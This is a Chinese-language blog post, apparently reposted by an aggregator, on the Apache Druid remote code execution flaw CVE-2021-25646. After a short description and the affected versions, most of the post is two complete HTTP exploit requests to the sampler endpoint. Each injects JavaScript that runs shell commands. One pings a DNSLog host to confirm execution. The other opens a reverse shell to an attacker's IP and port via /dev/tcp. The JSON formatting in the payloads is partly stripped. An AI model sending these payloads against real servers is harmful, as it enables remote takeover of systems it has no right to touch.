druid 远程命令执行(CVE-2021-25646)
Posted ying-hack
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了druid 远程命令执行(CVE-2021-25646)相关的知识,希望对你有一定的参考价值。
druid 远程命令执行
druid 介绍
Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端
影响版本
Apache Druid < 0.20.1
漏洞简介
Apache Druid包括执行用户提供的javascript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
漏洞复现
-
DNSLog
POST /druid/indexer/v1/sampler HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 679 Connection: close "type": "index", "spec": "type": "index", "ioConfig": "type": "index", "firehose": "type": "local", "baseDir": "quickstart/tutorial/", "filter": "wikiticker-2015-09-12-sampled.json.gz" , "dataSchema": "dataSource": "sample", "parser": "type": "string", "parseSpec": "format": "json", "timestampSpec": "column": "time", "format": "iso" , "dimensionsSpec": , "transformSpec": "transforms": [], "filter": "type": "javascript", "function": "function(value)return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')", "dimension": "added", "": "enabled": "true" , "samplerConfig": "numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"
-
反弹shell
POST /druid/indexer/v1/sampler HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 679 Connection: close "type": "index", "spec": "type": "index", "ioConfig": "type": "index", "firehose": "type": "local", "baseDir": "quickstart/tutorial/", "filter": "wikiticker-2015-09-12-sampled.json.gz" , "dataSchema": "dataSource": "sample", "parser": "type": "string", "parseSpec": "format": "json", "timestampSpec": "column": "time", "format": "iso" , "dimensionsSpec": , "transformSpec": "transforms": [], "filter": "type": "javascript", "function": "function(value)return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')", "dimension": "added", "": "enabled": "true" , "samplerConfig": "numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"
返回的状态码为200则为成功。
该漏洞是在认证完之后才可以复现的!!!
以上是关于druid 远程命令执行(CVE-2021-25646)的主要内容,如果未能解决你的问题,请参考以下文章